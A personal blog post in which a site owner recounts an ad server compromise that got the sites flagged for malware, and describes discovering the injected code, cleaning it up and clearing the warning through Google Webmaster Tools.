Over the past 3 years or so, Google and, later, Firefox began taking a more active role in the fight against sites distributing malware by warning users before they allow passage to a site that they’ve detected as a possible threat.
I know this because… I had several of those sites.
Not on purpose, of course – it turns out my ad server (I use OpenX to manage banners and other stuff across multiple websites, which makes a lot of things easier) was hacked this week and someone inserted some nastiness into the ad delivery code for several banners. The original ads still appeared, but other hidden stuff also got loaded that, presumably, posed a threat to some browser/operating system combinations.
The impact
So what happens when you get flagged? Your search engine rankings don’t change, at least not right away, but there is a “this site may harm your computer” warning that appears under the page title in the search results, and you’re treated to an interstitial warning if you click through anyway. If you’re using Firefox, it’s even more disruptive, with a big red box showing up before you’re able to proceed:
See the little "ignore this warning" link in the corner? Yeah, neither did your visitors.
Of course, you’ve got a loyal fanbase for your site, and they’re not going to trust some computer warning over you, right? Yeah… About that:
Discovery
The affected sites aren’t commerce sites, and the ads don’t see enough traffic for me to obsess over daily stats reports, so in theory this could have gone on for a while before I found out about it. Thankfully, I’ve got users and Google to help me there. More on Google in a moment, but it’s really valuable to have a good relationship with your site’s recurring users and have a clear way for them to get in touch with you. I received multiple emails about the problem, which was useful, since I don’t Google myself unless I’m doing SEO work (not this week) and I don’t use Firefox as often as I use Safari.
As I hinted earlier, you can actually get Google to tell you when this happens, but for that you need to tell them a bit about your sites first:
Google Webmaster Tools
Google has a really helpful tool for this kind of thing (and some other stuff too) called Google Webmaster Tools. I don’t know where the link is for this, but rather than link to it I’ll just tell you how I always get to it: I Google it. (Aside: a lot of Google’s services work this way, and it took me a long time to realize that this is probably on purpose, them being a search engine and all.)
You’ll need to register your sites with them, which means uploading a file to your server or setting a DNS record up (pretty much the same system as with Google Analytics,) and once you’ve done that you can see alerts about malware along with a bunch of interesting search engine metrics and crawler reports that deserve a separate post.
More importantly, you can set things up so Google emails you these reports automatically and you don’t have to log into the system every day to make sure you haven’t been hacked. I hadn’t done this, so again, thanks to my users!
Fixing the holes
Before you try to restore your reputation, it’s vital that you fix the problem that got you into this mess, which is identifying the malware. The report from Google is actually helpful in narrowing this down, specifying which pages have the attack code and which URLs they point to. In my case, I was able to walk through the rendered page code and find the attack, which happened to be right next to my banner delivery code.
This is a whole other post, because it’s really interesting, but for now, let’s just say I was able to clean things up and plug the hole in the fence that let the attacker through, and then I looked at the page again to ensure that the attack code was no longer showing up.
Clearing your name
Google’s webmaster tools have a thing where you can request a malware review. It’s basically a button you click, then you sign off that you’ve actually fixed something.
Google’s form claims it takes 24-48 hours to clear the warning, but in my case it was less than 12, which was pretty spiffy.
…And we’re clear – for now
Amazingly, this was the first time I’ve had to deal with this kind of thing myself (I’ve consulted on a few attacks for clients in the past.) Was it avoidable? In hindsight, yes, but I’ve seen it happen to enough smart people to know that it’s not something I’m going to be terribly embarrassed about. Security has a cost, and every site has its own resource budget. For my personal sites, I’m going to spend some time defending my reputation, but I’m also going to spend more of my energy writing secure code for clients – I actually learn a lot from the forensics on these types of things, so while this was a hassle, it’s not like I walked away empty handed.
If nothing else, I’ve got a new justification for secure code when clients just want the quickest work possible: if your site has a security flaw, Google might block you. Phrases like “SQL injection” might not mean much to the average business owner, but losing 80% or more of your daily traffic, and the accompanying revenue, certainly does.
